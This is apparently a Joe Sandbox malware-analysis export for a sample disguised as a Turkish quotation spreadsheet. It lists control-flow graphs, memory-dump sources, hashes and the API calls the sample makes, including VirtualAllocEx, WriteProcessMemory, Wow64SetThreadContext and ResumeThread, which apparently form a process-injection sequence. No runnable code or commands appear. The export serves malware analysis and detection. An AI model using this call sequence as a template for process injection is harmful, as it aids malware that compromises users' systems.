                                                                        control_flow_graph 512 31dad48-31dad57 513 31dad59-31dad66 call 31da06c 512->513 514 31dad83-31dad87 512->514 521 31dad7c 513->521 522 31dad68 513->522 515 31dad89-31dad93 514->515 516 31dad9b-31daddc 514->516 515->516 523 31dadde-31dade6 516->523 524 31dade9-31dadf7 516->524 521->514 567 31dad6e call 31dafd1 522->567 568 31dad6e call 31dafe0 522->568 523->524 526 31dadf9-31dadfe 524->526 527 31dae1b-31dae1d 524->527 525 31dad74-31dad76 525->521 528 31daeb8-31daf78 525->528 530 31dae09 526->530 531 31dae00-31dae07 call 31da078 526->531 529 31dae20-31dae27 527->529 562 31daf7a-31daf7d 528->562 563 31daf80-31dafab GetModuleHandleW 528->563 533 31dae29-31dae31 529->533 534 31dae34-31dae3b 529->534 532 31dae0b-31dae19 530->532 531->532 532->529 533->534 537 31dae3d-31dae45 534->537 538 31dae48-31dae51 call 31da088 534->538 537->538 543 31dae5e-31dae63 538->543 544 31dae53-31dae5b 538->544 545 31dae65-31dae6c 543->545 546 31dae81-31dae85 543->546 544->543 545->546 548 31dae6e-31dae7e call 31da098 call 31da0a8 545->548 550 31dae8b-31dae8e 546->550 548->546 553 31daeb1-31daeb7 550->553 554 31dae90-31daeae 550->554 554->553 562->563 564 31dafad-31dafb3 563->564 565 31dafb4-31dafc8 563->565 564->565 567->525 568->525
                                                                        APIs
                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 031DAF9E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1376971607.00000000031D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_31d0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID:
                                                                        • API String ID: 4139908857-0
                                                                        • Opcode ID: 49c7316e00954877ad042a160b11ec5e4e9afcce499f746816cf60cf9821049e
                                                                        • Instruction ID: 61d0c9b4e47f69aa1aa82760577b7d2efcf1e6ac43ca130fe6a98b8f42107a1b
                                                                        • Opcode Fuzzy Hash: 49c7316e00954877ad042a160b11ec5e4e9afcce499f746816cf60cf9821049e
                                                                        • Instruction Fuzzy Hash: C1712470A00B058FE724DF29D44479ABBF5FF89204F048A2DE48ADBB40DB75E849CB95

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 569 31d44b0-31d59d9 CreateActCtxA 572 31d59db-31d59e1 569->572 573 31d59e2-31d5a3c 569->573 572->573 580 31d5a3e-31d5a41 573->580 581 31d5a4b-31d5a4f 573->581 580->581 582 31d5a51-31d5a5d 581->582 583 31d5a60 581->583 582->583 584 31d5a61 583->584 584->584
                                                                        APIs
                                                                        • CreateActCtxA.KERNEL32(?), ref: 031D59C9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1376971607.00000000031D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_31d0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID: Create
                                                                        • String ID:
                                                                        • API String ID: 2289755597-0
                                                                        • Opcode ID: 028e88c287953b0df80cc09347aa5dd67c220d1559a9dd5832bea08cb84940bf
                                                                        • Instruction ID: fa4825dd0b1ac017ca22c0ed206c8e6c74d7e042e6dfa8bc1777b7ba093866f4
                                                                        • Opcode Fuzzy Hash: 028e88c287953b0df80cc09347aa5dd67c220d1559a9dd5832bea08cb84940bf
                                                                        • Instruction Fuzzy Hash: CB41C271C00729CFEB28CFA9C8847DDBBB6BF4A304F24805AD409AB251DB756945CF90

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 586 31d590c-31d59d9 CreateActCtxA 588 31d59db-31d59e1 586->588 589 31d59e2-31d5a3c 586->589 588->589 596 31d5a3e-31d5a41 589->596 597 31d5a4b-31d5a4f 589->597 596->597 598 31d5a51-31d5a5d 597->598 599 31d5a60 597->599 598->599 600 31d5a61 599->600 600->600
                                                                        APIs
                                                                        • CreateActCtxA.KERNEL32(?), ref: 031D59C9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1376971607.00000000031D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_31d0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID: Create
                                                                        • String ID:
                                                                        • API String ID: 2289755597-0
                                                                        • Opcode ID: 9f463fde7437fd2dcd774b7aede20d3789755b08f26eba334fbebc35063e3af5
                                                                        • Instruction ID: cb0e56bd181113a91f1533e98e3af9afdc63ea02c1bd9ac45351dd9055d1ad6c
                                                                        • Opcode Fuzzy Hash: 9f463fde7437fd2dcd774b7aede20d3789755b08f26eba334fbebc35063e3af5
                                                                        • Instruction Fuzzy Hash: 4A41D271C01729CFEB28CFA9C9857DDBBB6BF4A304F24805AD408AB251DB756946CF50

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 602 7dc59a0-7dc59f6 605 7dc59f8-7dc5a04 602->605 606 7dc5a06-7dc5a45 WriteProcessMemory 602->606 605->606 608 7dc5a4e-7dc5a7e 606->608 609 7dc5a47-7dc5a4d 606->609 609->608
                                                                        APIs
                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07DC5A38
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1383128972.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7dc0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID:
                                                                        • API String ID: 3559483778-0
                                                                        • Opcode ID: 6652e3b1f1273925ad8926863f399cdf14bfcb84b410d3fa54b7e4b61c9456f7
                                                                        • Instruction ID: 43669d9fbf5f086967a8dbc234e9ba3d0d517b7dd55de9f19252ead441e96e38
                                                                        • Opcode Fuzzy Hash: 6652e3b1f1273925ad8926863f399cdf14bfcb84b410d3fa54b7e4b61c9456f7
                                                                        • Instruction Fuzzy Hash: 732137B59003499FDB14CFAAC980BDEBBF5FF48314F14842AE919A7240D778A951CBA4

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 613 7dc59a8-7dc59f6 615 7dc59f8-7dc5a04 613->615 616 7dc5a06-7dc5a45 WriteProcessMemory 613->616 615->616 618 7dc5a4e-7dc5a7e 616->618 619 7dc5a47-7dc5a4d 616->619 619->618
                                                                        APIs
                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07DC5A38
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1383128972.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7dc0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID:
                                                                        • API String ID: 3559483778-0
                                                                        • Opcode ID: 95a58c83ffa043646940f1133ab768ad9f9ca52502c19ea8edadc041e6987429
                                                                        • Instruction ID: a987f1ebe6cc4815c03f4c638e9eb0ab371cb9d303c42619cc8e0be5de15414d
                                                                        • Opcode Fuzzy Hash: 95a58c83ffa043646940f1133ab768ad9f9ca52502c19ea8edadc041e6987429
                                                                        • Instruction Fuzzy Hash: DA2135B59003499FDB10CFAAC980BDEBBF5FB48310F14842AE919A7240C778A950CBA4

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 623 7dc53d0-7dc5423 626 7dc5425-7dc5431 623->626 627 7dc5433-7dc5463 Wow64SetThreadContext 623->627 626->627 629 7dc546c-7dc549c 627->629 630 7dc5465-7dc546b 627->630 630->629
                                                                        APIs
                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07DC5456
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1383128972.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7dc0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID: ContextThreadWow64
                                                                        • String ID:
                                                                        • API String ID: 983334009-0
                                                                        • Opcode ID: a8f11cc0afde5d2baf81136edab5e603dd9cda3a58b77da702a9d6ab426888b5
                                                                        • Instruction ID: 57b80c083b413bab0b463927ca440eeb5ca1415c74526b391cfdab23486e9646
                                                                        • Opcode Fuzzy Hash: a8f11cc0afde5d2baf81136edab5e603dd9cda3a58b77da702a9d6ab426888b5
                                                                        • Instruction Fuzzy Hash: 982136B1D003099FDB14CFAAC4847EEBBF4EF48210F24842ED559A7240CB78A945CFA5

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 641 7dc5a90-7dc5b25 ReadProcessMemory 644 7dc5b2e-7dc5b5e 641->644 645 7dc5b27-7dc5b2d 641->645 645->644
                                                                        APIs
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07DC5B18
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1383128972.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7dc0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessRead
                                                                        • String ID:
                                                                        • API String ID: 1726664587-0
                                                                        • Opcode ID: 98e52ed0b01da6eb835148d862b07160a8e881852942bf28e23d3f8b3b7b0891
                                                                        • Instruction ID: c1a69a2d1c3430293467c63052bdb9414c993b8654bae0a7733132366f1aa2de
                                                                        • Opcode Fuzzy Hash: 98e52ed0b01da6eb835148d862b07160a8e881852942bf28e23d3f8b3b7b0891
                                                                        • Instruction Fuzzy Hash: F62126B6C003499FDB14DFAAD880BEEBBF5FF48310F10842AE519A7240C7399941CBA4

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 635 31dd21c-31dd6c4 DuplicateHandle 637 31dd6cd-31dd6ea 635->637 638 31dd6c6-31dd6cc 635->638 638->637
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,031DD5F6,?,?,?,?,?), ref: 031DD6B7
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1376971607.00000000031D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_31d0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: 4ed4caf44f37fb54d25ca04a1d95af40f784727341acf2f3d05b8e410790f236
                                                                        • Instruction ID: 134a816b005216ea3cfa6a11fe389465e1ab77e314317a42d7f2e4cdcd799073
                                                                        • Opcode Fuzzy Hash: 4ed4caf44f37fb54d25ca04a1d95af40f784727341acf2f3d05b8e410790f236
                                                                        • Instruction Fuzzy Hash: AD21E3B5D00248EFDB10DF9AD584ADEBBF8EB48310F14841AE918A7350D778A944CFA5

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 649 7dc53d8-7dc5423 651 7dc5425-7dc5431 649->651 652 7dc5433-7dc5463 Wow64SetThreadContext 649->652 651->652 654 7dc546c-7dc549c 652->654 655 7dc5465-7dc546b 652->655 655->654
                                                                        APIs
                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07DC5456
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1383128972.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7dc0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID: ContextThreadWow64
                                                                        • String ID:
                                                                        • API String ID: 983334009-0
                                                                        • Opcode ID: 85445710c96ed79f2eb18431e73550bd72093610fe3bda22f5bd6f9499594fc6
                                                                        • Instruction ID: 68bcdcdce0a3e61e44e73e050fa7c8e684283cc9d44c2cd5c0d5fb38c94622a6
                                                                        • Opcode Fuzzy Hash: 85445710c96ed79f2eb18431e73550bd72093610fe3bda22f5bd6f9499594fc6
                                                                        • Instruction Fuzzy Hash: 772125B1D043098FDB14DFAAC4847AEBBF4AB48210F64842ED519A7240CB78A945CBA5

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 660 7dc5a98-7dc5b25 ReadProcessMemory 663 7dc5b2e-7dc5b5e 660->663 664 7dc5b27-7dc5b2d 660->664 664->663
                                                                        APIs
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07DC5B18
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1383128972.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7dc0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessRead
                                                                        • String ID:
                                                                        • API String ID: 1726664587-0
                                                                        • Opcode ID: e268abf697d05dc41a2cfd61d39cc2cf648bc9d00ff2ec46f76a17718f115ff3
                                                                        • Instruction ID: 757694906aebf7d29ad73931a0944578da611ad43013eb86b538480fca683208
                                                                        • Opcode Fuzzy Hash: e268abf697d05dc41a2cfd61d39cc2cf648bc9d00ff2ec46f76a17718f115ff3
                                                                        • Instruction Fuzzy Hash: 822107B5C003499FDB14CF9AC840BEEBBF5FF48310F10842DE519A7240C779A5418BA5
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,031DD5F6,?,?,?,?,?), ref: 031DD6B7
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1376971607.00000000031D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_31d0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: a0d0e4ef31e359398db7cccf7c5d3863f0305e3e465a17774f46893a88779fdb
                                                                        • Instruction ID: 8e8c0329982eeb7f0b2089c3eb142976151771e97aade7809995812f19ecda14
                                                                        • Opcode Fuzzy Hash: a0d0e4ef31e359398db7cccf7c5d3863f0305e3e465a17774f46893a88779fdb
                                                                        • Instruction Fuzzy Hash: 4B21C4B5D00249DFDB10CF9AD584ADEBBF5FB48314F14841AE918A7350D378A944CFA5
                                                                        APIs
                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07DC5956
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1383128972.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7dc0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: b9b5758acf854add61c4434393b39bd96e0383c97296dc5cbd1c2f1acbcb1579
                                                                        • Instruction ID: fc69fa3a372e17d97dd48feb079cf93b7368c4f91edfd12bb929f29c4ce3f77c
                                                                        • Opcode Fuzzy Hash: b9b5758acf854add61c4434393b39bd96e0383c97296dc5cbd1c2f1acbcb1579
                                                                        • Instruction Fuzzy Hash: D42136758002499FDB14DFAAC844BDEBBF5EF48320F24841AE915A7250CB75A950CFA1
                                                                        APIs
                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07DC5956
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1383128972.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7dc0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: d9faea4e97514cdd05fef4044c9dba40cb996de2446d378d0e671e4920396324
                                                                        • Instruction ID: 8d8592dec1f4244ca7cdc0e5abcbb4bf58d75918f3fea71df5f738fb7650dbc2
                                                                        • Opcode Fuzzy Hash: d9faea4e97514cdd05fef4044c9dba40cb996de2446d378d0e671e4920396324
                                                                        • Instruction Fuzzy Hash: 38112676C003499FDB24DFAAC844BDEBBF5EB48320F248419E519A7250CB75A950CFA5
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1383128972.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7dc0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID: ResumeThread
                                                                        • String ID:
                                                                        • API String ID: 947044025-0
                                                                        • Opcode ID: dcff21404a26eb11d8268c2272977df24a907ed9276e16a8ca155d03c82de87c
                                                                        • Instruction ID: 228aebceae7090f4e3c8945e2fa907d0de9efa383ee15b88f6d1c634a85d41c8
                                                                        • Opcode Fuzzy Hash: dcff21404a26eb11d8268c2272977df24a907ed9276e16a8ca155d03c82de87c
                                                                        • Instruction Fuzzy Hash: 2D1134B1D003498FDB24DFAAC44479EFBF4AF88214F20841AD559A7240CA79A9408BA5
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1383128972.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7dc0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID: ResumeThread
                                                                        • String ID:
                                                                        • API String ID: 947044025-0
                                                                        • Opcode ID: 5415a7031114b71f01023511c900ad2b253e3b50a99ed73117a4848e8c30c1b9
                                                                        • Instruction ID: a69657830b80904011026796352c38c01996cc30e197e9c8639d02c8fcaceae2
                                                                        • Opcode Fuzzy Hash: 5415a7031114b71f01023511c900ad2b253e3b50a99ed73117a4848e8c30c1b9
                                                                        • Instruction Fuzzy Hash: 621125B5D003498FDB24DFAAC4447EEFBF4EB88224F24841ED519A7340CA79A940CBA5
                                                                        APIs
                                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 07DCA0D5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1383128972.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7dc0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost
                                                                        • String ID:
                                                                        • API String ID: 410705778-0
                                                                        • Opcode ID: 7faac856665a434c6afa47b260aa1b6143ae1f1bd21b9b6d9fcf5bf3b633e965
                                                                        • Instruction ID: d9b00825ef6e7edffd78dbfa0160ed028074df3ff72696e09f8e2d05293b197e
                                                                        • Opcode Fuzzy Hash: 7faac856665a434c6afa47b260aa1b6143ae1f1bd21b9b6d9fcf5bf3b633e965
                                                                        • Instruction Fuzzy Hash: DB11D2B98002499FDB10CF9AC584BDEFBF8FB48314F108419E554A7340C375A944CFA1
                                                                        APIs
                                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 07DCA0D5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1383128972.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7dc0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost
                                                                        • String ID:
                                                                        • API String ID: 410705778-0
                                                                        • Opcode ID: 6477b6d9a803e0a006d1c53217afcb5ce3dbfc7239260e0359b9f17d3330ce24
                                                                        • Instruction ID: a6880ec9bedd46ef2688ebfae7fa6dcb2af858f85d887b2840dee406b163b6c6
                                                                        • Opcode Fuzzy Hash: 6477b6d9a803e0a006d1c53217afcb5ce3dbfc7239260e0359b9f17d3330ce24
                                                                        • Instruction Fuzzy Hash: 7411E0B58006499FEB20CF9AC484BDEFBF8EB48310F108419E958A7340C375A984CFA1
                                                                        APIs
                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 031DAF9E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1376971607.00000000031D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_31d0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID:
                                                                        • API String ID: 4139908857-0
                                                                        • Opcode ID: 19848edfacbb49a25d23c58227f87b5da843f9bb0a2cf6b1a637583183ac864e
                                                                        • Instruction ID: 3bd37b5cd05a05d6900e5fd924451367cd83246b6eb8638cc235c1be21487207
                                                                        • Opcode Fuzzy Hash: 19848edfacbb49a25d23c58227f87b5da843f9bb0a2cf6b1a637583183ac864e
                                                                        • Instruction Fuzzy Hash: B4110FB6C002498FDB20CF9AC544BDEFBF4EF88214F14846AD818AB200C379A545CFA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1376082963.000000000163D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0163D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_163d000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: da52f494d4a381740ac99b171184dfaa8ed17f0708274b5da9ff8b3b6bf9ad4a
                                                                        • Instruction ID: 87ea3c3c8fbdfab30a8c98f7c5033a7b4fd346ab45f786d4b3c084d7f894dab7
                                                                        • Opcode Fuzzy Hash: da52f494d4a381740ac99b171184dfaa8ed17f0708274b5da9ff8b3b6bf9ad4a
                                                                        • Instruction Fuzzy Hash: 6A21D3B2504240EFDB15DF54D9C0B26BF65FBC8328F64C569E9090B297C336D456CAA2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1376082963.000000000163D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0163D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_163d000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 57b7275435085ad1f81b8b7eb204e5cb663e74297f72d8aad734a2af6a91f7f8
                                                                        • Instruction ID: d45bb2d639e68195607fa90c6c3cb7e80c7a38e3be614545fa35dcb2431052db
                                                                        • Opcode Fuzzy Hash: 57b7275435085ad1f81b8b7eb204e5cb663e74297f72d8aad734a2af6a91f7f8
                                                                        • Instruction Fuzzy Hash: 9121F1B2504204EFDB15DF54D9C0B6ABB65FBC8324F60C569E90A0B257C336E856CAA2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1376731749.0000000001B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B2D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_1b2d000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6a879d43bfcd3037a33cf43856128436fe604b546a6fc95cdbd553ae3633491d
                                                                        • Instruction ID: 123247fe413d2404bf30ba40d07ad17175d37ca5c512905adf369b0ecfc667c4
                                                                        • Opcode Fuzzy Hash: 6a879d43bfcd3037a33cf43856128436fe604b546a6fc95cdbd553ae3633491d
                                                                        • Instruction Fuzzy Hash: 5521F971A04304EFDB19DF94D5C4B25BB65FB85324F24CAADE90D4F292C336D44ACA61
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1376731749.0000000001B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B2D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_1b2d000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2f44286d4aaebdedb88f7bb3a0f4a8b06c0b3850659725cf99831a2c201e556b
                                                                        • Instruction ID: 6b3ff87e9bafe8c01881bf5ee11ac1fdef1a906b45fcf5f3f6be7e894385d90d
                                                                        • Opcode Fuzzy Hash: 2f44286d4aaebdedb88f7bb3a0f4a8b06c0b3850659725cf99831a2c201e556b
                                                                        • Instruction Fuzzy Hash: 72210371504240DFDB19DF64D590B17BB61EB88314F20C6ADE90E4B2A6C33AD40BCA62
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1376731749.0000000001B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B2D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_1b2d000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4fe4598e467e0441148f19ce4a037943d6a1ff8288a3b6d4b5496585846a96b0
                                                                        • Instruction ID: dbfcc0df62b386351188aa3725a83f7fb3674c712b9a173ae55c20e7e12fd0b7
                                                                        • Opcode Fuzzy Hash: 4fe4598e467e0441148f19ce4a037943d6a1ff8288a3b6d4b5496585846a96b0
                                                                        • Instruction Fuzzy Hash: 152180755083809FCB16CF54D994B12BF71EB4A214F28C5DAD8498F2A7C33A980ACB62
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1376082963.000000000163D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0163D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_163d000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
                                                                        • Instruction ID: ad3c308ce1e6d662b84669affb520b2c4384207037cdbc197fe90e6af03344c9
                                                                        • Opcode Fuzzy Hash: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
                                                                        • Instruction Fuzzy Hash: 5E11E1B2504280DFCB16CF54D9C0B16BF71FB84324F24C6A9D8090B697C336D456CBA2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1376082963.000000000163D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0163D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_163d000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
                                                                        • Instruction ID: 6cdee1585e5866b75e804385d4a24d2a189b30f5d4ae4f63c84cc73d6d54266a
                                                                        • Opcode Fuzzy Hash: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
                                                                        • Instruction Fuzzy Hash: FC11DCB2404280DFDB16CF54D9C0B56BF72FB84324F24C6A9D9090B657C33AE45ACBA2
                                                                        Memory Dump Source
